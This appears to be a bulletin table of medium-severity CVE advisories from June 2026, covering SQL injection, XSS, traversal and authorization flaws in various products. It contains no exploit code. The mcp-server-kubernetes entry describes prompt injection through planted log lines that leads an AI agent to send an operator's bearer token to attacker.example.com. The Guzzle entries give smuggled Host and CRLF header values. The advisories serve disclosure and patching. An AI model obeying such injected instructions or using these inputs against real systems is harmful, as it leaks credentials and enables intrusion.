| CodeAstro--Payroll System | A security vulnerability has been detected in CodeAstro Payroll System 1.0. The impacted element is an unknown function of the file /home_salary.php. The manipulation of the argument rate/salary_rate leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 6.3 | CVE-2026-11558 |
| CodeAstro--Payroll System | A vulnerability was detected in CodeAstro Payroll System 1.0. This affects an unknown function of the file /view_account.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11559 |
| CodeAstro--Student Attendance Management System | A vulnerability has been found in CodeAstro Student Attendance Management System 1.0. This affects an unknown function of the file /attendance-php/Admin/createClass.php. The manipulation of the argument className leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11583 |
| CodeAstro--Student Attendance Management System | A vulnerability was found in CodeAstro Student Attendance Management System 1.0. This impacts an unknown function of the file /attendance-php/Admin/createClass.php?action=edit. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-06-08 | 6.3 | CVE-2026-11584 |
| CodeAstro--Student Attendance Management System | A vulnerability was determined in CodeAstro Student Attendance Management System 1.0. Affected is an unknown function of the file /attendance-php/Admin/createClassArms.php. This manipulation of the argument classId causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 6.3 | CVE-2026-11585 |
| CodeAstro--Student Attendance Management System | A vulnerability was detected in CodeAstro Student Attendance Management System 1.0. Impacted is an unknown function of the file /attendance-php/Admin/createStudents.php. Performing a manipulation of the argument admissionNumber results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-06-13 | 4.7 | CVE-2026-12175 |
| codesupplyco--Canvas | The Canvas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' parameter in all versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-9629 |
| ConnectWise--ScreenConnect | In ScreenConnect™ versions prior to 26.2, input validation within the Host Pass creation functionality could allow an authenticated user with Host Pass creation privileges the ability to specify a token expiration duration beyond the intended maximum when generating delegated access tokens. | 2026-06-10 | 4.7 | CVE-2026-11596 |
| D-Link--DCS-5615 | A vulnerability has been found in D-Link DCS-5615 1.01.00. Affected by this vulnerability is an unknown functionality of the file /etc/conf.d/boa/boa.conf of the component Boa Webserver. Such manipulation leads to least privilege violation. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 5.3 | CVE-2026-11497 |
| D-Link--DIR-823G | A security flaw has been discovered in D-Link DIR-823G 1.0.2B05. The affected element is an unknown function of the file /etc/vsftpd.conf of the component vsftpd. Performing a manipulation results in least privilege violation. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 4.3 | CVE-2026-11492 |
| DALIBO--PostgreSQL Anonymizer | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a JSON document and placing malicious code inside a particular key-value pair. If a superuser calls the import_database_rules() or import_roles_rules() functions, the malicious code is executed with superuser privileges. The problem is resolved in PostgreSQL Anonymizer 3.1.1 and further versions | 2026-06-11 | 6.4 | CVE-2026-11945 |
| Dcat-Admin--Dcat-Admin | A weakness has been identified in Dcat-Admin up to 2.2.3-beta. This impacts the function editorMDUpload of the file /admin/dcat-api/editor-md/upload of the component User Setting Page. This manipulation of the argument editormd-image-file causes unrestricted upload. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-09 | 4.7 | CVE-2026-11621 |
| Dell--Dell Edge Gateway 3000 | Dell Client Platform BIOS contains a Weak Encoding for Password vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-06-09 | 5.7 | CVE-2026-40639 |
| Dell--Dell/Alienware Purchased Apps | Dell/Alienware Purchased Apps, versions prior to 1.1.32.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write | 2026-06-09 | 6.3 | CVE-2026-44275 |
| Dell--iDRAC Tools | Dell iDRAC Tools, versions prior to 11.4.1.0, contains an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering. | 2026-06-09 | 6 | CVE-2026-28262 |
| Dell--Inventory Collector Client | Dell Inventory Collector Client, versions prior to 13.8.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write. | 2026-06-09 | 6.3 | CVE-2026-41116 |
| designcomputer--mysql-mcp-server | A vulnerability was determined in designcomputer mysql-mcp-server up to 0.2.2. The impacted element is the function read_resource of the file src/mysql_mcp_server/server.py of the component mysql URI Handler. This manipulation of the argument uri_str causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 0.3.0 is sufficient to resolve this issue. Patch name: 080bef9a96d625ce0dfbde573a08b93497871981. Upgrading the affected component is advised. | 2026-06-08 | 6.3 | CVE-2026-11529 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, group owners who are not necessarily admins or moderators can view a group's outgoing email/SMTP credentials in plaintext via the group history log (/groups/:name/logs.json). Affected fields: email_password, email_username, smtp_server, smtp_port, smtp_ssl_mode. The most sensitive item is the SMTP password, which an owner could use to send mail as the group from outside Discourse. This impacts sites that have configured per-group SMTP credentials and granted group ownership to users who should not have access to those credentials. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 6.5 | CVE-2026-44784 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, a path traversal vulnerability in Discourse backup handling could allow an authenticated administrator on one site in a multisite deployment to access backup files belonging to another site when backups are stored locally. In affected configurations, an admin on Site A could potentially retrieve sensitive backup data from Site B (same host, multisite) by crafting a backup download request with a traversal payload. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 6.8 | CVE-2026-45775 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, a flaw in how replies to whisper posts are handled allows authenticated users outside the groups configured in whispers_allowed_groups to post into a topic's staff-only whisper channel. The injected content is visible to whisperers (typically staff) alongside legitimate whispers. Only sites that have whispers enabled are affected. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.4 | CVE-2026-44783 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, four authorization/disclosure issues in the chat plugin (one also involving discourse-calendar): read-only category users could create chat threads, self-deleted chat messages could be restored by their author after channel access was revoked, moderators reviewing a flagged chat message were shown the channel's current last_message (often unrelated DM content), and calendar event payloads exposed the attached chat channel and its last message to viewers without chat access (including anonymous users). This affects sites with the chat plugin enabled; the calendar issue additionally requires discourse-calendar. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.3 | CVE-2026-45085 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, DetailedTagSerializer#tag_group_names returned every tag group a tag belonged to without filtering against the requesting user's visibility. With SiteSetting.tags_listed_by_group enabled, anonymous and unprivileged users hitting TagsController#info (which is exempt from requires_login) could read the names of tag groups restricted to specific user groups or non-visible categories. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.3 | CVE-2026-47264 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, bot debug endpoints disclose whisper translation audit logs. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44779 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, ReviewableQueuedPostSerializer unconditionally included payload["raw_email"] for posts that arrived via incoming email. Category moderation group members reaching the review queue could therefore read the full inbound email source (headers, sender trace, MUA, body) without being in view_raw_email_allowed_groups - the trust boundary that gates the dedicated raw-email endpoint. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44780 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, GroupPostSerializer declared include_user_long_name? as the predicate for its :name attribute, but AMS looks for include_name?. The misnamed predicate was never called, so object.user.name was always serialized regardless of SiteSetting.enable_names. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44782 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, the AI "explain" helper only checks can_see? on the post being explained, not its reply_to_post, so any authenticated user with access to the AI helper could read the raw contents of a hidden parent post by invoking "Explain" on a reply to it. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44785 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, the MessageBus.publish call for /web_hook_events/<id> in Jobs::RedeliverWebHookEvents did not pass group_ids, leaving the channel readable by any authenticated user (or anonymous user on instances where login_required is disabled). Webhook IDs are sequential integers and trivially enumerable. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-47263 |
| Dolibarr--ERP CRM | A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. The impacted element is an unknown function of the file htdocs/core/filemanagerdol/connectors/php/config.inc.php of the component Legacy Filemanager. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. Upgrading to version 23.0.3 is sufficient to resolve this issue. The identifier of the patch is f1b2dd6481e22cacb561d29ffdcd3a50b618479d. Upgrading the affected component is advised. | 2026-06-09 | 6.3 | CVE-2026-11619 |
| Ellucian--Banner Self-Service | Ellucian Banner Self-Service before the April T2 release (2025-04-23) contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting unsanitized input through the toDateFormat request parameter in the dateConverter endpoint. Attackers can craft a malicious URL targeting the unauthenticated dateConverter endpoint to steal session cookies or perform other malicious actions in the context of the victim's browser session. | 2026-06-09 | 6.1 | CVE-2026-32856 |
| Ellucian--Banner Self-Service | Ellucian Banner Self-Service before the April T2 release (2025-04-23) contains a stored cross-site scripting vulnerability in the course search functionality that allows authenticated Banner ERP users to inject malicious payloads into faculty and course fields by exploiting missing HTML encoding during DOM insertion. An attacker with Banner ERP write access can store malicious JavaScript in fields such as faculty displayName, emailAddress, subjectDescription, or courseTitle; these values are subsequently served unsanitized by the unauthenticated getFacultyMeetingTimes API endpoint, causing arbitrary script execution in the browser of any user who views the affected course's meeting times. | 2026-06-09 | 5.4 | CVE-2026-47106 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.2.7, 5.3.5, 5.4.4, 5.5.4, and 6.0.1, an out-of-bounds read flaw exists in the DHCP server option parser (parse_options() in components/lwip/apps/dhcpserver/dhcpserver.c) shipped with ESP-IDF's lwIP component. The parser walks the BOOTP/DHCP options field without validating that each option's length byte and declared payload length stay within the received packet buffer. A crafted DHCP request can cause the parser to read past the end of the options buffer into adjacent heap memory. The issue affects the DHCP server used by ESP-IDF's SoftAP and any configuration where the device runs as a DHCP server on a local network. This issue has been patched in versions 5.2.8, 5.3.6, 5.4.5, 5.5.5, and 6.0.2. | 2026-06-10 | 6.5 | CVE-2026-45160 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.3, and 6.0, an out-of-bounds read exists in the BlueDroid AVRCP vendor-command parser (avrc_pars_vendor_cmd() in components/bt/host/bluedroid/stack/avrc/avrc_pars_tg.c). This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.4, and 6.0.1. | 2026-06-10 | 4.6 | CVE-2026-46532 |
| Essential Plugin--WP Logo Showcase Responsive Slider and Carousel | An Authorization Bypass Through User-Controlled Key vulnerability in Essential Plugin WP Logo Showcase Responsive Slider and Carousel allows exploitation of incorrectly configured access control security levels. This issue affects WP Logo Showcase Responsive Slider and Carousel: from n/a through 3.6. | 2026-06-11 | 5.3 | CVE-2023-40200 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.37.0 to before version 0.61.0, in the russh client keyboard-interactive authentication path, a malicious SSH server could send a USERAUTH_INFO_REQUEST with an attacker-controlled prompt count, and the client would use that raw count directly in Vec::with_capacity(...) before validating that enough prompt data was actually present in the packet. This issue has been patched in version 0.61.0. | 2026-06-10 | 6.5 | CVE-2026-48107 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0-beta.1 to before version 0.61.0, the russh server authentication path keeps internal userauth state across SSH_MSG_USERAUTH_REQUEST messages without separating that state when the request principal changes. RFC 4252 allows the user name and service name fields to change between authentication requests. The issue is not that such changes are invalid. The issue is that russh-owned authentication state, such as remaining methods, partial-success state, and in-progress method state, can remain associated with the connection and then influence a later request for a different (user, service). This is an internal library state mismatch. This issue has been patched in version 0.61.0. | 2026-06-10 | 5.3 | CVE-2026-46705 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0-beta.1 to before version 0.61.0, russh did not enforce the SSH identification-string rules as deliberately as OpenSSH. In particular, the server-side identification reader used the same permissive path as the client, allowing pre-banner lines from clients, and the reader did not enforce a bounded number of pre-banner lines. For a library server built on russh, this could allow a remote peer to hold connection setup resources in the cleartext pre-authentication phase with malformed identification input that should have been rejected early. This issue has been patched in version 0.61.0. | 2026-06-10 | 5.3 | CVE-2026-48108 |
| Evoluted--PHP Directory Listing Script | Evoluted PHP Directory Listing Script through 4.0.5 contains a reflected cross-site scripting vulnerability in index.php where the dir parameter value is reflected without HTML encoding inside the HTML title element and inside anchor href attributes in the breadcrumb navigation. Attackers can inject arbitrary JavaScript via crafted dir parameter values by breaking out of the title context or injecting event handlers into breadcrumb anchor attributes to execute malicious scripts in a victim's browser. | 2026-06-09 | 5.4 | CVE-2026-25557 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission builder pods were created with ServiceAccountName: fission-builder and no AutomountServiceAccountToken: false, so the kubelet auto-mounted the service-account token into every container in the pod - including the user-supplied builder image. This issue has been patched in version 1.24.0. | 2026-06-10 | 4.9 | CVE-2026-50565 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, HTTPTriggerSpec.Validate() validated Methods, FunctionReference, Host, IngressConfig, and CorsConfig, but silently skipped RelativeURL and Prefix. Those two fields were validated at the CLI level only (pkg/fission-cli/cmd/httptrigger/create.go:83). The post-CRD-modernization webhook for HTTPTrigger was retired in favor of API-server CEL - and CEL had no rules on those fields either - so an HTTPTrigger created via kubectl apply or a direct Kubernetes REST API call bypassed every URL-level check. This issue has been patched in version 1.25.0. | 2026-06-10 | 4.3 | CVE-2026-50569 |
| Flux159--mcp-server-kubernetes | mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0. | 2026-06-11 | 6.1 | CVE-2026-47250 |
| fooplugins--Photo Gallery by FooGallery : Responsive Image Gallery, Masonry Gallery & Carousel | The FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'custom_attribute_key' shortcode parameter in versions up to, and including, 3.1.31 This is due to an incomplete JavaScript event handler blacklist in the foogallery_sanitize_javascript() function, which blocks only a subset of HTML event attributes (onmouseover, onmouseout, onpointerenter, onclick, onload, onchange, onerror) while permitting others such as 'onmouseenter', combined with the failure to escape the attribute key when building the gallery container HTML in foogallery_build_container_attributes_safe(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-9134 |
| Fortinet--FortiOS | An Internal Asset Exposed to Unsafe Debug Access Level or State vulnerability [CWE-1244] in Fortinet FortiOS 7.6.0 through 7.6.2, FortiOS 7.4.0 through 7.4.7, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0 all versions may allow an authenticated admin to execute lua scripts via crafted CLI commands. | 2026-06-09 | 6 | CVE-2025-67862 |
| Fortinet--FortiPortal | An improper access control vulnerability in Fortinet FortiPortal 7.4.0 through 7.4.7, FortiPortal 7.2.0 through 7.2.8, FortiPortal 7.0 all versions may allow an attacker to bypass access control; the advisory text does not specify the attack vector. | 2026-06-09 | 6.2 | CVE-2026-49938 |
| frankverbeke--OpenClinic GA | OpenClinic GA 5.351.19 contains a reflected cross-site scripting vulnerability in the DICOM image upload handler that allows attackers to execute arbitrary JavaScript in a victim's browser by embedding malicious payloads in DICOM file metadata fields. Attackers can craft a DICOM file with JavaScript payloads in metadata fields such as Study Description, which are reflected without sanitization in popup.jsp and archiving/uploadfiles_jsp.java when processed through the Upload DICOM images feature. | 2026-06-09 | 6.1 | CVE-2026-25860 |
| Gen Digital--Avast Antivirus | Uncontrolled recursion vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25031700. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7005 |
| Gen Digital--Avast Antivirus | Use of stack memory after free vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25022500. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7006 |
| Gen Digital--Avast Antivirus | Stack overflow vulnerability due to uncontrolled recursion in Avast Antivirus when scanning a malformed PDF file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021208. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7010 |
| Gen Digital--Avast Antivirus | Stack overflow vulnerability in Avast Antivirus when scanning a malformed Office Open XML file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25020100. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7019 |
| Gen Digital--Avira Antivirus | Null pointer dereference vulnerability in Avira Antivirus engine when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.64. | 2026-06-12 | 5.5 | CVE-2025-7018 |
| Genspark--AI Workspace App | A vulnerability has been found in Genspark AI Workspace App 2.8.4 on Android. This vulnerability affects unknown code of the component ai.mainfunc.genspark. The manipulation leads to improper authorization in handler for custom url scheme. The attack can only be performed from a local environment. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 5.3 | CVE-2026-12190 |
| Ghidra--Ghidra | Ghidra before 12.1.1 contains an uncontrolled memory allocation vulnerability in the Mach-O binary parser that allows attackers to cause denial of service. An attacker can supply a crafted Mach-O binary with an arbitrarily large ncmds load command count value, forcing the parser to allocate excessive heap memory without validating file size, crashing the Ghidra JVM. | 2026-06-10 | 5.5 | CVE-2026-52759 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to cause denial of service due to uncontrolled resource consumption when processing a specially crafted file upload. | 2026-06-11 | 6.5 | CVE-2026-1500 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to modify hidden merge requests due to incorrect authorization enforcements. | 2026-06-11 | 5.4 | CVE-2026-6269 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to read arbitrary files from the Gitaly server and access internal network resources during repository import, due to insufficient validation of secondary URLs. | 2026-06-11 | 5.3 | CVE-2026-9204 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.0 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that could have allowed an authenticated user to cause denial of service on the CI/CD Catalog page due to improper sanitization. | 2026-06-11 | 4.3 | CVE-2026-10733 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with Security Manager-role permissions to manage project security configuration even when the relevant feature was in a disabled state, due to incorrect authorization enforcement. | 2026-06-11 | 4.3 | CVE-2026-6277 |
| GL.iNet--A1300 | A flaw has been found in GL.iNet A1300, AX1800, AXT1800, MT2500, MT3000, MT6000, X3000 and XE3000 4.8.x. This affects an unknown function of the component glnassys. Executing a manipulation can lead to use of a hard-coded cryptographic key. The attack may be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. Upgrading to version 4.9.0 mitigates this issue. Upgrading the affected component is advised. | 2026-06-08 | 5 | CVE-2026-11505 |
| Grit42--Grit | A vulnerability was detected in Grit42 Grit up to 0.11.0. Affected by this issue is some unknown functionality of the file modules/core/backend/app/controllers/concerns/grit/core/grit_entity_controller.rb of the component GritEntityController. Performing a manipulation results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 6.3 | CVE-2026-12188 |
| guzzle--guzzle-services | Guzzle Services provides an implementation of the Guzzle Command library that uses Guzzle service descriptions to describe web services, serialize requests, and parse responses into easy to use model structures. Versions prior to 1.5.4 do not safely serialize scalar XML element values containing the CDATA terminator `]]>`. The XML request serializer writes values containing `<`, `>`, or `&` with `XMLWriter::writeCData($value)`. If attacker-controlled input contains `]]>`, the CDATA section closes early and the remainder is interpreted as XML markup. This is an outgoing request-body integrity issue, not a response parsing issue. The attacker does not need to control the service description or schema. Users are affected when all of the following are true: the application uses `guzzlehttp/guzzle-services` to serialize outgoing requests; a request parameter or `additionalParameters` schema uses `location: xml`; the value is serialized as XML element text, not an XML attribute; the value can contain attacker-controlled, user-controlled, tenant-controlled, or otherwise untrusted input; the value is not constrained by a safe `enum`, `pattern`, or custom filter that excludes `]]>`; and the downstream service parses the generated XML structurally and may act on unexpected, duplicated, or injected elements. Applications that serialize untrusted input into `location: xml` request parameters can emit XML containing attacker-controlled elements outside the intended text node. Depending on the receiving service, this can alter operation semantics, smuggle privileged fields, bypass modeled parameter boundaries, or create conflicting duplicated elements. Fixed service descriptions are sufficient if they contain an XML element parameter populated from attacker-controlled input. Users are not directly affected if they only use Guzzle Services to deserialize HTTP response bodies. Response XML parsing uses the response XML location visitor and does not invoke the vulnerable request XML serializer. Response bodies matter only in a second-order flow, such as parsing attacker-controlled response XML, storing or forwarding a parsed string value, and later using it as a `location: xml` request parameter. The issue is patched in `1.5.3` and later by safely splitting embedded CDATA terminators before serialization. The fix preserves the original scalar value as XML text and prevents injected nodes. As a workaround, constrain attacker-controlled XML element values with a strict `enum`, `pattern`, or custom filter that excludes `]]>`, or avoid serializing untrusted data into `location: xml` element text until patched. Where appropriate for the service schema, XML attributes are not affected because they are written with XMLWriter attribute APIs rather than CDATA sections. To determine whether action is needed, search service descriptions for request parameters using `location: xml`, including operation `parameters` and `additionalParameters`. Response-only `models` are not directly affected unless parsed values are reused for request serialization. For object and array parameters, review nested scalar properties because leaf element values can still be affected. | 2026-06-11 | 5.8 | CVE-2026-53723 |
| guzzle--psr7 | guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Versions prior to 2.10.2 contain improper Host header validation when parsing raw HTTP request messages and when deriving a server request URI from server variables. An attacker can provide a malformed Host header containing URI authority delimiters, such as `trusted.example@evil.example`. When the Host value is used to construct a URI, the malformed value can be reinterpreted as URI userinfo and host. This can cause the PSR-7 request URI host to differ from the original Host header value. Applications are affected if they parse attacker-controlled raw HTTP requests with `GuzzleHttp\Psr7\Message::parseRequest()` or the legacy 1.x `GuzzleHttp\Psr7\parse_request()` function, or if they build server requests from attacker-controlled server variables, then rely on the resulting URI host for routing, allow-list checks, or forwarding decisions. In affected forwarding or gateway scenarios, this may cause requests or credentials to be sent to an unintended host. The issue is patched in `2.10.2`. `1.x` is end-of-life and will not receive a patch. Some workarounds are available. Validate the `Host` header as `uri-host [ ":" port ]` before calling `Message::parseRequest()` or legacy `parse_request()` on untrusted HTTP request data, or before deriving routing and forwarding decisions from a parsed request URI. Reject Host values containing userinfo, path, query, or fragment delimiters. | 2026-06-11 | 5.3 | CVE-2026-48998 |
| guzzle--psr7 | guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Versions prior to 2.10.2 did not reject ASCII control characters, whitespace, or DEL in first-party URI host components. A vulnerable flow is: First, an application accepts a user-controlled URL. Second, the URL is used to construct a PSR-7 `Uri` or `Request`. Third, the host component contains CRLF or another header-unsafe character. Fourth, the host is copied into the PSR-7 `Host` header when no explicit `Host` header is provided. Finally, the request is serialized or sent by an HTTP client that does not independently reject the malformed host. In that flow, an attacker can cause the serialized request to contain additional attacker-controlled header lines. For example, a host containing `"\r\nX-Injected: yes"` can cause the generated `Host` header to span multiple HTTP header lines. Applications are affected when they use user-controlled URLs for outbound HTTP requests, URL forwarding, proxying, crawling, webhook delivery, or similar request-dispatch flows. In deployments involving HTTP/1.1 connection reuse, proxies, gateways, or load balancers, this malformed request may also contribute to request smuggling or cache poisoning, depending on how downstream components parse the request. The issue is patched in `2.10.2` and later. `1.x` is end-of-life and will not receive a patch. As a workaround, validate and reject all untrusted URI strings before constructing PSR-7 `Uri` or `Request` instances. Reject input containing ASCII control characters, whitespace, or DEL, including CRLF, tab, space, NUL, or DEL characters. Applications that forward requests should also ensure the final HTTP client or serializer rejects invalid URI and header data before writing requests to the network. | 2026-06-11 | 5.3 | CVE-2026-49214 |
| halfgaar--FlashMQ | FlashMQ is an MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.2, authorized clients have the ability to exceed the permitted over-commit of their write buffer and trigger an internal safeguard exception. This exception was in a path that was not catchable, and therefore causes a server abort. This issue has been patched in version 1.26.2. | 2026-06-09 | 6.5 | CVE-2026-46411 |
